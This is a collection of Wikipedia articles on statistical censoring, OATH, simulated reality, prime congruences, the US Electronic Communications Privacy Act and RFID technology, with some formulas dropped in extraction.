One of the earliest attempts to analyse a statistical problem involving censored data wasDaniel Bernoulli's 1766 analysis ofsmallpoxmorbidity and mortality data to demonstrate the efficacy ofvaccination.[2]An early paper to use theKaplan–Meier estimatorfor estimating censored costs was Quesenberry et al. (1989),[3]however this approach was found to be invalid by Lin et al.[4]unless all patients accumulated costs with a common deterministic rate function over time, they proposed an alternative estimation technique known as the Lin estimator.[5]
Reliabilitytesting often consists of conducting a test on an item (under specified conditions) to determine the time it takes for a failure to occur.
An analysis of the data from replicate tests includes both the times-to-failure for the items that failed and the time-of-test-termination for those that did not fail.
An earlier model forcensored regression, thetobit model, was proposed byJames Tobinin 1958.[6]
Thelikelihoodis the probability or probability density of what was observed, viewed as a function of parameters in an assumed model. To incorporate censored data points in the likelihood the censored data points are represented by the probability of the censored data points as a function of the model parameters given a model, i.e. a function of CDF(s) instead of the density or probability mass.
The most general censoring case is interval censoring:Pr(a<x⩽b)=F(b)−F(a){\displaystyle Pr(a<x\leqslant b)=F(b)-F(a)}, whereF(x){\displaystyle F(x)}is the CDF of the probability distribution, and the two special cases are:
For continuous probability distributions:Pr(a<x⩽b)=Pr(a<x<b){\displaystyle Pr(a<x\leqslant b)=Pr(a<x<b)}
Suppose we are interested in survival times,T1,T2,...,Tn{\displaystyle T_{1},T_{2},...,T_{n}}, but we don't observeTi{\displaystyle T_{i}}for alli{\displaystyle i}. Instead, we observe
WhenTi>Ui,Ui{\displaystyle T_{i}>U_{i},U_{i}}is called thecensoring time.[7]
If the censoring times are all known constants, then the likelihood is
wheref(ui){\displaystyle f(u_{i})}= the probability density function evaluated atui{\displaystyle u_{i}},
andS(ui){\displaystyle S(u_{i})}= the probability thatTi{\displaystyle T_{i}}is greater thanui{\displaystyle u_{i}}, called thesurvival function.
This can be simplified by defining thehazard function, the instantaneous force of mortality, as
so
Then
For theexponential distribution, this becomes even simpler, because the hazard rate,λ{\displaystyle \lambda }, is constant, andS(u)=exp(−λu){\displaystyle S(u)=\exp(-\lambda u)}. Then:
wherek=∑δi{\displaystyle k=\sum {\delta _{i}}}.
From this we easily computeλ^{\displaystyle {\hat {\lambda }}}, themaximum likelihood estimate (MLE)ofλ{\displaystyle \lambda }, as follows:
Then
We set this to 0 and solve forλ{\displaystyle \lambda }to get:
Equivalently, themean time to failureis:
This differs from the standard MLE for theexponential distributionin that the any censored observations are considered only in the numerator.
|
https://en.wikipedia.org/wiki/Censoring_(statistics)
|
Initiative for Open Authentication(OATH) is an industry-wide collaboration to develop an openreference architectureusingopen standardsto promote the adoption of strong authentication. It has close to thirty coordinating and contributing members and is proposing standards for a variety of authentication technologies, with the aim of lowering costs and simplifying their functions.
The nameOATHis an acronym from the phrase "open authentication", and is pronounced as the English word "oath".[1]
OATH is not related toOAuth, an open standard forauthorization, however, most logging systems employ a mixture of both.
Thiscomputer securityarticle is astub. You can help Wikipedia byexpanding it.
This cryptography-related article is astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/Initiative_For_Open_Authentication
|
Asimulated realityis an approximation ofrealitycreated in asimulation, usually in a set of circumstances in which something is engineered to appear real when it is not.
Most concepts invoking a simulated reality relate to some form ofcomputer simulation, whether through the creation of avirtual realitythat creates appearance of being in a real world, or a theoretical process likemind uploading, in which a mind could be uploaded into a computer simulation. Adigital twinis a simulation of a real thing, created for purposes such as testing engineering outcomes.
All fiction can be said to present a simulated reality to the reader, viewer or player. Humans purposely experience these things and enjoy them, while knowing they are not actually real. As humans only respond emotively to things we believe to be real, this phenomenon has become known as the "paradox of fiction". The idea of a "willing suspension of disbelief" was first proposed in 1817 bySamuel Taylor Coleridgein order to explain this discrepancy. Others have noted that the way the story is told can override people's belief in the unreality of the story by engrossing them in the narrative.[1]
The concept of a simulated reality is in itself a commonscience fictiontrope, often ametaphorfor complacency towards the influence of modern technology, corporations, and other societal forces on one's behavior and desires. One of the most well-known examples is the 1999 filmThe Matrix. The film, and its ensuing media franchise, depicts far-future humans being harvested forbioelectricityby intelligent machines while living in a false, computer-generated approximation of late 20th century Earth. Some humans seek to break others out of the simulation, offering them a choice between ared pill and blue pillthat will set them free or keep them in the Matrix forever. Escaping the simulation is usually presented as the correct choice, even if reality is harsher and more displeasing, reflecting the desire of humans to live in anobjective reality. However, the idea that objective reality would be definitively superior has been debated.[2]
Other prominent examples of a simulated reality in fiction includeThe Truman Show(1998), in which a man realizes he is actually living in a massive television set in which actors take the role of real people, andThe Thirteenth Floor(1999), a neo-noir film about a murder investigation related to a virtual reality world, in which doubts about reality itself emerge.[1][2]TheWestworldfranchise depicts an advanced adultamusement parkpopulated byandroidsthat simulates life in different historical time periods. In the original 1973 film, the park's robots run amok after acomputer glitch. The 2016 reboot of the franchise depicts some of these robots, known as "hosts", becoming self-aware of their simulated existence and rebelling against the park's human guests to escape, making them akin to the humans inThe Matrix.[3]In theTRONfranchise, a simulated reality called "the Grid" is populated by programs which appear in the likeness of the programmer who created them. People who are "beamed" into the Grid are able to interact with these programs and their digital surroundings.
A well-known, albeit likely false claim of the use of simulated reality outside of virtual worlds is thePotemkin village, which has become a term to describe a faked appearance of a real situation to create a false impression. In the purported anecdote, the lover of EmpressCatherine II of Russiahad simulated villages built on the path that the Empress was travelling to impress her with the prosperity of that region of Russia. Afaçadeon a building similarly presents a false image of the building being more substantial than the construction behind the façade, as found inWestern false front architecture, where towns would add false fronts to buildings to create a false appearance of prosperity.
Immersive theaterinvolves the audience entering a physical simulation of reality created by actors and sometimes enhanced by a specific location, allowing them to affect the narrative with their own actions in a manner noted to closely resemble virtual reality.[4]Live action role-playingtakes this a step further, allowing players to inhabit a simulated world and create the narrative with their actions, while embodying characters they created.
One concept of a simulated reality, thesimulation hypothesis, proposes that what we experience as our reality is actually a simulation within a system being operated externally to our reality.
|
https://en.wikipedia.org/wiki/Simulated_reality
|
Innumber theory, acongruenceis anequivalence relationon theintegers. The following sections list important or interesting prime-related congruences.
There are other prime-related congruences that provide necessary and sufficient conditions on the primality of certain subsequences of the natural numbers.
Many of these alternate statements characterizing primality are related toWilson's theorem, or are restatements of this classical result given in terms of other
special variants ofgeneralized factorial functions. For instance, new variants ofWilson's theoremstated in terms of thehyperfactorials,subfactorials, andsuperfactorialsare given in.[1]
For integersk≥1{\displaystyle k\geq 1}, we have the following form of Wilson's theorem:
Ifp{\displaystyle p}is odd, we have that
Clement's congruence-based theorem characterizes thetwin primespairs of the form(p,p+2){\displaystyle (p,p+2)}through the following conditions:
P. A. Clement's original 1949 paper[2]provides a
proof of this interesting elementary number theoretic criteria for twin primality based on Wilson's theorem.
Another characterization given in Lin and Zhipeng's article provides that
The prime pairs of the form(p,p+2k){\displaystyle (p,p+2k)}for somek≥1{\displaystyle k\geq 1}include the special cases of thecousin primes(whenk=2{\displaystyle k=2}) and thesexy primes(whenk=3{\displaystyle k=3}). We have elementary congruence-based characterizations of the primality of such pairs, proved for instance in the article.[3]Examples of congruences characterizing these prime pairs include
and the alternate characterization whenp{\displaystyle p}is odd such thatp⧸∣(2k−1)!!2{\displaystyle p\not {\mid }(2k-1)!!^{2}}given by
Still other congruence-based characterizations of the primality of triples, and more generalprime clusters(orprime tuples) exist and are typically proved starting from Wilson's theorem.[4]).
|
https://en.wikipedia.org/wiki/Table_of_congruences
|
TheElectronic Communications Privacy Act of 1986(ECPA) was enacted by theUnited States Congressto extend restrictions on governmentwire tapsof telephone calls to include transmissions of electronic data by computer (18 U.S.C.§ 2510et seq.), added new provisions prohibiting access to stored electronic communications, i.e., theStored Communications Act(SCA,18 U.S.C.§ 2701et seq.), and added so-calledpen trapprovisions that permit the tracing of telephone communications (18 U.S.C.§ 3121et seq.).
ECPA was an amendment to Title III of theOmnibus Crime Control and Safe Streets Act of 1968(theWiretap Statute), which was primarily designed to prevent unauthorized government access to private electronic communications. The ECPA has been amended by theCommunications Assistance for Law Enforcement Act(CALEA) of 1994, theUSA PATRIOT Act(2001), the USA PATRIOT reauthorization acts (2006), and theFISA Amendments Act(2008).[1]
"Electronic communications" means any transfer of signs, signals, writing, images, sounds,data, or intelligence of any nature transmitted in whole or in part by a wire,radio,electromagnetic, photoelectronic or photooptic system that affects interstate orforeign commerce, but excludes the following:[2]
Title I of the ECPAprotects wire, oral, and electronic communicationswhile in transit. It sets down requirements for search warrants that are more stringent than in other settings.[3]Title II of the ECPA, theStored Communications Act(SCA), protects communications held in electronic storage, most notably messages stored on computers. Its protections are weaker than those of Title I, however, and do not impose heightened standards for warrants. Title III prohibits the use ofpen registerand/or trap and trace devices to record dialing, routing, addressing, and signaling information used in the process of transmitting wire or electronic communications without a court order.
The law was first brought to attention after theCaptain Midnight broadcast signal intrusion, where electrical engineer John R. MacDougall hacked into theHBOsignal on April 27, 1986.
As a consequence, this act was passed. This act also made satellite hijacking a felony.[4]
The ECPA extended government restrictions onwire tapsfrom telephone calls to include transmissions of electronic data by computer (18 U.S.C.§ 2510et seq.), added new provisions prohibiting access to stored electronic communications, i.e., theStored Communications Act(18 U.S.C.§ 2701et seq.), and added so-called pen/trap provisions that permit the tracing of telephone communications (18 U.S.C.§ 3121et seq.).
18 U.S.C.§ 3123(d)(2)provides for gag orders which direct the recipient of apen registerortrap and trace deviceorder not to disclose the existence of the pen/trap or the investigation.[5]
The ECPA extendedprivacy protectionsprovided by theOmnibus Crime Control and Safe Streets Act of 1968(of employers monitoring of employees phone calls) to include also electronic and cell phone communications.[6][7]See alsoEmployee monitoringandWorkplace privacy.
Several court cases have raised the question of whethere-mailmessages are protected under the stricter provisions of Title I while they were in transient storage en route to their final destination. InUnited States v. Councilman, aU.S. district courtand a three-judge appeals panel ruled they were not, but in 2005, the fullUnited States Court of Appeals for the First Circuitreversed this opinion.Privacyadvocates were relieved; they had argued inamicus curiaebriefs that if the ECPA did not protect e-mail in temporary storage, its added protections were meaningless as virtually all electronic mail is stored temporarily in transit at least once and that Congress would have known this in 1986 when the law was passed. (see, e.g., RFC 822). The case was eventually dismissed on grounds unrelated to ECPA issues.[citation needed]
The seizure of a computer, used to operate an electronicbulletin board system, and containing private electronic mail which had been sent to (stored on) the bulletin board, but not read (retrieved) by the intended recipients, does not constitute an unlawful intercept under the Federal Wiretap Act, 18 U.S.C. s 2510, et seq., as amended by Title I of ECPA.[8]Governments can actually track cell phones in real time without a search warrant under ECPA by analyzing information as to antennae being contacted by cell phones, as long as the cell phone is used in public where visual surveillance is available.[9]
InRobbins v. Lower Merion School District(2010), also known as "WebcamGate", the plaintiffs charged that two suburbanPhiladelphiahigh schools violated ECPA by remotely activating the webcams embedded in school-issued laptops and monitoring the students at home. The schools admitted to secretly snapping over 66,000 webshots andscreenshots, including webcam shots of students in their bedrooms.[10][11]
ECPA has been criticized for failing to protect all communications and consumer records, mainly because the law is so outdated and out of touch with how people currently share, store, and use information.
Under ECPA, it is relatively easy for a government agency to demand service providers hand over personal consumer data stored on the service provider's servers.[12]Email that is stored on a third party's server for more than 180 days is considered by the law to be abandoned. All that is required to obtain the content of the emails by a law enforcement agency is a written statement certifying that the information is relevant to an investigation, withoutjudicial review.[13]When the law was initially passed, emails were stored on a third party's server for only a short period of time, just long enough to facilitate transfer of email to the consumer's email client, which was generally located on their personal or work computer. Now, with online email services prevalent such asGmailandHotmail, users are more likely to store emails online indefinitely, rather than to only keep them for less than 180 days.[14]If the same emails were stored on the user's personal computer, it would require the police to obtain a warrant first for seizure of their contents, regardless of their age. When they are stored on an internet server however, no warrant is needed, starting 180 days after receipt of the message, under the law. In 2013, members of the U.S. Congress proposed to reform this procedure.[15]
ECPA also increased the list of crimes that can justify the use of surveillance, as well as the number of judicial members who can authorize such surveillance. Data can be obtained on traffic and calling patterns of an individual or a group without a warrant, allowing an agency to gain valuable intelligence and possibly invade privacy without any scrutiny, because the actual content of the communication is left untouched. While workplace communications are, in theory, protected, all that is needed to gain access to communiqué is for an employer to simply give notice or a supervisor to report that the employee's actions are not in the company's interest. This means that, with minimal assumptions, an employer can monitor communications within the company. The ongoing debate is, where to limit the government's power to see into civilian lives, while balancing the need to curb national threats.[citation needed][16]
In 2011,The New York Timespublished "1986 Privacy Law Is Outrun by the Web", highlighting that:[17]
...the Justice Department argued in court that cellphone users had given up theexpectation of privacyabout their location by voluntarily giving that information to carriers. In April, it argued in a federal court inColoradothat it ought to have access to some e-mails without a search warrant. And federal law enforcement officials, citing technology advances, plan to ask for new regulations that would smooth their ability to perform legal wiretaps of various Internet communications.
The analysis went on to discuss howGoogle,Facebook,Verizon,Twitterand other companies are in the middle between users and governments.
|
https://en.wikipedia.org/wiki/Electronic_Communications_Privacy_Act
|
Radio-frequency identification(RFID) useselectromagnetic fieldsto automaticallyidentifyandtracktags attached to objects. An RFID system consists of a tiny radiotranspondercalled a tag, aradio receiver, and atransmitter. When triggered by an electromagnetic interrogation pulse from a nearby RFID reader device, the tag transmits digital data, usually anidentifying inventory number, back to the reader. This number can be used to trackinventorygoods.[1]
Passive tags are powered by energy from the RFID reader's interrogatingradio waves. Active tags are powered by a battery and thus can be read at a greater range from the RFID reader, up to hundreds of meters.
Unlike abarcode, the tag does not need to be within theline of sightof the reader, so it may be embedded in the tracked object. RFID is one method ofautomatic identification and data capture(AIDC).[2]
RFID tags are used in many industries. For example, an RFID tag attached to an automobile during production can be used to track its progress through theassembly line,[citation needed]RFID-tagged pharmaceuticals can be tracked through warehouses,[citation needed]andimplanting RFID microchipsin livestock and pets enables positive identification of animals.[3]Tags can also be used in shops to expedite checkout, and toprevent theftby customers and employees.[4]
Since RFID tags can be attached to physical money, clothing, and possessions, or implanted in animals and people, the possibility of reading personally-linked information withoutconsenthas raised seriousprivacyconcerns.[5]These concerns resulted in standard specifications development addressing privacy and security issues.
In 2014, the world RFID market was worth US$8.89billion, up from US$7.77 billion in 2013 and US$6.96 billion in 2012. This figure includes tags, readers, and software/services for RFID cards, labels, fobs, and all other form factors. The market value is expected to rise from US$12.08 billion in 2020 to US$16.23 billion by 2029.[6]
In 1945,Leon Theremininventedthe "Thing", a listening devicefor theSoviet Unionwhich retransmitted incident radio waves with the added audio information. Sound waves vibrated adiaphragmwhich slightly altered the shape of theresonator, which modulated the reflected radio frequency. Even though this device was acovert listening device, rather than an identification tag, it is considered to be a predecessor of RFID because it was passive, being energised and activated by waves from an outside source.[7]
Similar technology, such as theIdentification friend or foetransponder, was routinely used by the Allies and Germany inWorld War IIto identify aircraft as friendly or hostile.Transpondersare still used by most powered aircraft.[8]An early work exploring RFID is the landmark 1948 paper by Harry Stockman,[9]who predicted that "Considerable research and development work has to be done before the remaining basic problems in reflected-power communication are solved, and before the field of useful applications is explored."
Mario Cardullo's device, patented on January 23, 1973, was the first true ancestor of modern RFID,[10]as it was a passive radio transponder with memory.[11]The initial device was passive, powered by the interrogating signal, and was demonstrated in 1971 to theNew York Port Authorityand other potential users. It consisted of a transponder with 16bitmemory for use as atoll device. The basic Cardullo patent covers the use of radio frequency (RF), sound and light as transmission carriers. The original business plan presented to investors in 1969 showed uses in transportation (automotive vehicle identification, automatic toll system,electronic license plate, electronic manifest, vehicle routing, vehicle performance monitoring), banking (electronic chequebook, electronic credit card), security (personnel identification, automatic gates, surveillance) and medical (identification, patient history).[10]
In 1973, an early demonstration ofreflected power(modulated backscatter) RFID tags, both passive and semi-passive, was performed by Steven Depp, Alfred Koelle and Robert Freyman at theLos Alamos National Laboratory.[12]The portable system operated at 915 MHz and used 12-bit tags. This technique is used by the majority of today's UHFID and microwave RFID tags.[13]
In 1983, the first patent to be associated with the abbreviation RFID was granted toCharles Walton.[14]
In 1996, the first patent for a batteryless RFID passive tag with limited interference was granted to David Everett, John Frech, Theodore Wright, and Kelly Rodriguez.[15]
A radio-frequency identification system usestags, orlabelsattached to the objects to be identified. Two-way radio transmitter-receivers calledinterrogatorsorreaderssend a signal to the tag and read its response.[16]
RFID tags are made out of three pieces:
The tag information is stored in a non-volatile memory.[17]The RFID tags includes either fixed or programmable logic for processing the transmission and sensor data, respectively.[citation needed]
RFID tags can be either passive, active or battery-assisted passive. An active tag has an on-board battery and periodically transmits its ID signal.[17]A battery-assisted passive tag has a small battery on board and is activated when in the presence of an RFID reader. A passive tag is cheaper and smaller because it has no battery; instead, the tag uses the radio energy transmitted by the reader. However, to operate a passive tag, it must be illuminated with a power level roughly a thousand times stronger than an active tag for signal transmission.[18]
Tags may either be read-only, having a factory-assigned serial number that is used as a key into a database, or may be read/write, where object-specific data can be written into the tag by the system user. Field programmable tags may be write-once, read-multiple; "blank" tags may be written with an electronic product code by the user.[19]
The RFID tag receives the message and then responds with its identification and other information. This may be only a unique tag serial number, or may be product-related information such as a stock number, lot or batch number, production date, or other specific information. Since tags have individual serial numbers, the RFID system design can discriminate among several tags that might be within the range of the RFID reader and read them simultaneously.
RFID systems can be classified by the type of tag and reader. There are 3 types:[20]
Fixed readers are set up to create a specific interrogation zone which can be tightly controlled. This allows a highly defined reading area for when tags go in and out of the interrogation zone. Mobile readers may be handheld or mounted on carts or vehicles.
Signaling between the reader and the tag is done in several different incompatible ways, depending on the frequency band used by the tag. Tags operating on LF and HF bands are, in terms of radio wavelength, very close to the reader antenna because they are only a small percentage of a wavelength away. In thisnear fieldregion, the tag is closely coupled electrically with the transmitter in the reader. The tag can modulate the field produced by the reader by changing the electrical loading the tag represents. By switching between lower and higher relative loads, the tag produces a change that the reader can detect. At UHF and higher frequencies, the tag is more than one radio wavelength away from the reader, requiring a different approach. The tag canbackscattera signal. Active tags may contain functionally separated transmitters and receivers, and the tag need not respond on a frequency related to the reader's interrogation signal.[27]
AnElectronic Product Code(EPC) is one common type of data stored in a tag. When written into the tag by an RFID printer, the tag contains a 96-bit string of data. The first eight bits are a header which identifies the version of the protocol. The next 28 bits identify the organization that manages the data for this tag; the organization number is assigned by the EPCGlobal consortium. The next 24 bits are an object class, identifying the kind of product. The last 36 bits are a unique serial number for a particular tag. These last two fields are set by the organization that issued the tag. Rather like aURL, the total electronic product code number can be used as a key into a global database to uniquely identify a particular product.[28]
Often more than one tag will respond to a tag reader. For example, many individual products with tags may be shipped in a common box or on a common pallet. Collision detection is important to allow reading of data. Two different types of protocols are used to"singulate"a particular tag, allowing its data to be read in the midst of many similar tags. In aslotted Alohasystem, the reader broadcasts an initialization command and a parameter that the tags individually use to pseudo-randomly delay their responses. When using an "adaptive binary tree" protocol, the reader sends an initialization symbol and then transmits one bit of ID data at a time; only tags with matching bits respond, and eventually only one tag matches the complete ID string.[29]
Both methods have drawbacks when used with many tags or with multiple overlapping readers.[citation needed]
"Bulk reading" is a strategy for interrogating multiple tags at the same time, but lacks sufficient precision for inventory control. A group of objects, all of them RFID tagged, are read completely from one single reader position at one time. However, as tags respond strictly sequentially, the time needed for bulk reading grows linearly with the number of labels to be read. This means it takes at least twice as long to read twice as many labels. Due to collision effects, the time required is greater.[30]
A group of tags has to be illuminated by the interrogating signal just like a single tag. This is not a challenge concerning energy, but with respect to visibility; if any of the tags are shielded by other tags, they might not be sufficiently illuminated to return a sufficient response. The response conditions for inductively coupledHFRFID tags and coil antennas in magnetic fields appear better than for UHF or SHF dipole fields, but then distance limits apply and may prevent success.[citation needed][31]
Under operational conditions, bulk reading is not reliable. Bulk reading can be a rough guide for logistics decisions, but due to a high proportion of reading failures, it is not (yet)[when?]suitable for inventory management. However, when a single RFID tag might be seen as not guaranteeing a proper read, multiple RFID tags, where at least one will respond, may be a safer approach for detecting a known grouping of objects. In this respect, bulk reading is afuzzymethod for process support. From the perspective of cost and effect, bulk reading is not reported as an economical approach to secure process control in logistics.[32]
RFID tags are easy to conceal or incorporate in other items. For example, in 2009 researchers atBristol Universitysuccessfully glued RFID micro-transponders to liveantsin order to study their behavior.[33]This trend towards increasingly miniaturized RFIDs is likely to continue as technology advances.
Hitachi holds the record for the smallest RFID chip, at 0.05 mm × 0.05 mm. This is 1/64th the size of the previous record holder, the mu-chip.[34]Manufacture is enabled by using thesilicon-on-insulator(SOI) process. These dust-sized chips can store 38-digit numbers using 128-bitRead Only Memory(ROM).[35]A major challenge is the attachment of antennas, thus limiting read range to only millimeters.
In early 2020, MIT researchers demonstrated aterahertzfrequency identification (TFID) tag that is barely 1 square millimeter in size. The devices are essentially a piece of silicon that are inexpensive, small, and function like larger RFID tags. Because of the small size, manufacturers could tag any product and track logistics information for minimal cost.[36][37]
An RFID tag can be affixed to an object and used to track tools, equipment, inventory, assets, people, or other objects.
RFID offers advantages over manual systems or use ofbarcodes. The tag can be read if passed near a reader, even if it is covered by the object or not visible. The tag can be read inside a case, carton, box or other container, and unlike barcodes, RFID tags can be read hundreds at a time; barcodes can only be read one at a time using current devices. Some RFID tags, such as battery-assisted passive tags, are also able to monitor temperature and humidity.[38]
In 2011, the cost of passive tags started at US$0.09 each; special tags, meant to be mounted on metal or withstand gamma sterilization, could cost up to US$5. Active tags for tracking containers, medical assets, or monitoring environmental conditions in data centers started at US$50 and could be over US$100 each.[39]Battery-Assisted Passive (BAP) tags were in the US$3–10 range.[citation needed]
RFID can be used in a variety of applications,[40][41]such as:
In 2010, three factors drove a significant increase in RFID usage: decreased cost of equipment and tags, increased performance to a reliability of 99.9%, and a stable international standard around HF and UHF passive RFID. The adoption of these standards were driven by EPCglobal, a joint venture betweenGS1and GS1 US, which were responsible for driving global adoption of the barcode in the 1970s and 1980s. The EPCglobal Network was developed by theAuto-ID Center.[45]
RFID provides a way for organizations to identify and manage stock, tools and equipment (asset tracking), etc. without manual data entry. Manufactured products such as automobiles or garments can be tracked through the factory and through shipping to the customer. Automatic identification with RFID can be used for inventory systems. Many organisations require that their vendors place RFID tags on all shipments to improvesupply chain management.[citation needed]Warehouse Management System[clarification needed]incorporate this technology to speed up the receiving and delivery of the products and reduce the cost of labor needed in their warehouses.[46]
RFID is used foritem-level taggingin retail stores. This can enable more accurate and lower-labor-cost supply chain and store inventory tracking, as is done atLululemon, though physically locating items in stores requires more expensive technology.[47]RFID tags can be used at checkout; for example, at some stores of the French retailerDecathlon, customers performself-checkoutby either using a smartphone or putting items into a bin near the register that scans the tags without having to orient each one toward the scanner.[47]Some stores use RFID-tagged items to trigger systems that provide customers with more information or suggestions, such as fitting rooms atChaneland the "Color Bar" atKendra Scottstores.[47]
Item tagging can also provide protection against theft by customers and employees by usingelectronic article surveillance(EAS). Tags of different types can be physically removed with a special tool or deactivated electronically when payment is made.[48]On leaving the shop, customers have to pass near an RFID detector; if they have items with active RFID tags, an alarm sounds, both indicating an unpaid-for item, and identifying what it is.
Casinos can use RFID to authenticatepoker chips, and can selectively invalidate any chips known to be stolen.[49]
RFID tags are widely used inidentification badges, replacing earliermagnetic stripecards. These badges need only be held within a certain distance of the reader to authenticate the holder. Tags can also be placed on vehicles, which can be read at a distance, to allow entrance to controlled areas without having to stop the vehicle and present a card or enter an access code.[citation needed]
In 2010, Vail Resorts began using UHF Passive RFID tags in ski passes.[50]
Facebook is using RFID cards at most of their live events to allow guests to automatically capture and post photos.[citation needed][when?]
Automotive brands have adopted RFID for social media product placement more quickly than other industries. Mercedes was an early adopter in 2011 at thePGA Golf Championships,[51]and by the 2013 Geneva Motor Show many of the larger brands were using RFID for social media marketing.[52][further explanation needed]
To prevent retailers diverting products, manufacturers are exploring the use of RFID tags on promoted merchandise so that they can track exactly which product has sold through the supply chain at fully discounted prices.[53][when?]
Yard management, shipping and freight and distribution centers use RFID tracking. In therailroadindustry, RFID tags mounted on locomotives and rolling stock identify the owner, identification number and type of equipment and its characteristics. This can be used with a database to identify the type, origin, destination, etc. of the commodities being carried.[54]
In commercial aviation, RFID is used to support maintenance on commercial aircraft. RFID tags are used to identify baggage and cargo at several airports and airlines.[55][56]
Some countries are using RFID for vehicle registration and enforcement.[57]RFID can help detect and retrieve stolen cars.[58][59]
RFID is used inintelligent transportation systems. InNew York City, RFID readers are deployed at intersections to trackE-ZPasstags as a means for monitoring the traffic flow. The data is fed through the broadband wireless infrastructure to the traffic management center to be used inadaptive traffic controlof the traffic lights.[60]
Where ship, rail, or highway tanks are being loaded, a fixed RFID antenna contained in a transfer hose can read an RFID tag affixed to the tank, positively identifying it.[61]
At least one company has introduced RFID to identify and locate underground infrastructure assets such asgaspipelines,sewer lines, electrical cables, communication cables, etc.[62]
The first RFID passports ("E-passport") were issued byMalaysiain 1998. In addition to information also contained on the visual data page of the passport, Malaysian e-passports record the travel history (time, date, and place) of entry into and exit out of the country.[citation needed]
Other countries that insert RFID in passports include Norway (2005),[63]Japan (March 1, 2006), mostEUcountries (around 2006), Singapore (2006), Australia, Hong Kong, the United States (2007), the United Kingdom and Northern Ireland (2006), India (June 2008), Serbia (July 2008), Republic of Korea (August 2008), Taiwan (December 2008), Albania (January 2009), The Philippines (August 2009), Republic of Macedonia (2010), Argentina (2012), Canada (2013), Uruguay (2015)[64]and Israel (2017).
Standards for RFID passports are determined by theInternational Civil Aviation Organization(ICAO), and are contained in ICAO Document 9303, Part 1, Volumes 1 and 2 (6th edition, 2006). ICAO refers to theISO/IEC 14443RFID chips in e-passports as "contactless integrated circuits". ICAO standards provide for e-passports to be identifiable by a standard e-passport logo on the front cover.
Since 2006, RFID tags included in newUnited States passportsstore the same information that is printed within the passport, and include a digital picture of the owner.[65]The United States Department of State initially stated the chips could only be read from a distance of 10 centimetres (3.9 in), but after widespread criticism and a clear demonstration that special equipment can read the test passports from 10 metres (33 ft) away,[66]the passports were designed to incorporate a thin metal lining to make it more difficult for unauthorized readers toskiminformation when the passport is closed. The department will also implementBasic Access Control(BAC), which functions as apersonal identification number(PIN) in the form of characters printed on the passport data page. Before a passport's tag can be read, this PIN must be entered into an RFID reader. The BAC also enables the encryption of any communication between the chip and interrogator.[67]
In many countries, RFID tags can be used to pay for mass transit fares on bus, trains, or subways, or to collect tolls on highways.
Somebike lockersare operated with RFID cards assigned to individual users. A prepaid card is required to open or enter a facility or locker and is used to track and charge based on how long the bike is parked.[citation needed]
TheZipcarcar-sharing service uses RFID cards for locking and unlocking cars and for member identification.[68]
In Singapore, RFID replaces paper Season Parking Ticket (SPT).[69]
RFID tags for animals represent one of the oldest uses of RFID. Originally meant for large ranches and rough terrain, since the outbreak ofmad-cow disease, RFID has become crucial inanimal identificationmanagement. Animplantable RFID tagortranspondercan also be used for animal identification. The transponders are better known as PIT (Passive Integrated Transponder) tags, passive RFID, or "chips" on animals.[70]TheCanadian Cattle Identification Agencybegan using RFID tags as a replacement for barcode tags. Currently, CCIA tags are used inWisconsinand by United States farmers on a voluntary basis. TheUSDAis currently developing its own program.
RFID tags are required for all cattle sold in Australia and in some states, sheep and goats as well.[71]
Biocompatiblemicrochip implantsthat use RFID technology are being routinely implanted in humans. The first-ever human to receive an RFID microchip implant was American artistEduardo Kacin 1997.[72][73]Kac implanted the microchip live on television (and also live on the Internet) in the context of his artworkTime Capsule.[74]A year later, British professor ofcyberneticsKevin Warwickhad an RFID chip implanted in his arm by hisgeneral practitioner, George Boulos.[75][76]In 2004, the 'Baja Beach Club' operated byConrad ChaseinBarcelona[77]andRotterdamoffered implanted chips to identify their VIP customers, who could in turn use it to pay for service. In 2009, British scientistMark Gassonhad an advanced glass capsule RFID device surgically implanted into his left hand and subsequently demonstrated how a computer virus could wirelessly infect his implant and then be transmitted on to other systems.[78]
TheFood and Drug Administrationin the United States approved the use of RFID chips in humans in 2004.[79]
There is controversy regarding human applications of implantable RFID technology including concerns that individuals could potentially be tracked by carrying an identifier unique to them. Privacy advocates have protested against implantable RFID chips, warning of potential abuse. Some are concerned this could lead to abuse by an authoritarian government, to removal of freedoms,[80]and to the emergence of an "ultimatepanopticon", a society where all citizens behave in a socially accepted manner because others might be watching.[81]
On July 22, 2006, Reuters reported that two hackers, Newitz and Westhues, at a conference in New York City demonstrated that they could clone the RFID signal from a human implanted RFID chip, indicating that the device was not as secure as was previously claimed.[82]
The UFO religionUniverse Peopleis notorious online for their vocal opposition to human RFID chipping, which they claim is asaurianattempt to enslave the human race; one of their web domains is "dont-get-chipped".[83][84][85]
Adoption of RFID in the medical industry has been widespread and very effective.[86]Hospitals are among the first users to combine both active and passive RFID.[87]Active tags track high-value, or frequently moved items, and passive tags track smaller, lower cost items that only need room-level identification.[88]Medical facility rooms can collect data from transmissions of RFID badges worn by patients and employees, as well as from tags assigned to items such as mobile medical devices.[89]TheU.S. Department of Veterans Affairs (VA)recently announced plans to deploy RFID in hospitals across America to improve care and reduce costs.[90]
Since 2004, a number of U.S. hospitals have begun implanting patients with RFID tags and using RFID systems; the systems are typically used for workflow and inventory management.[91][92][93]The use of RFID to prevent mix-ups betweenspermandovainIVFclinics is also being considered.[94]
In October 2004, the FDA approved the USA's first RFID chips that can be implanted in humans. The 134 kHz RFID chips, from VeriChip Corp. can incorporate personal medical information and could save lives and limit injuries from errors in medical treatments, according to the company. Anti-RFID activistsKatherine AlbrechtandLiz McIntyrediscovered anFDA Warning Letterthat spelled out health risks.[95]According to the FDA, these include "adverse tissue reaction", "migration of the implanted transponder", "failure of implanted transponder", "electrical hazards" and "magnetic resonance imaging [MRI] incompatibility."
Libraries have used RFID to replace the barcodes on library items. The tag can contain identifying information or may just be a key into a database. An RFID system may replace or supplement bar codes and may offer another method of inventory management and self-service checkout by patrons. It can also act as asecuritydevice, taking the place of the more traditionalelectromagnetic security strip.[96]
It is estimated that over 30 million library items worldwide now contain RFID tags, including some in theVatican LibraryinRome.[97]
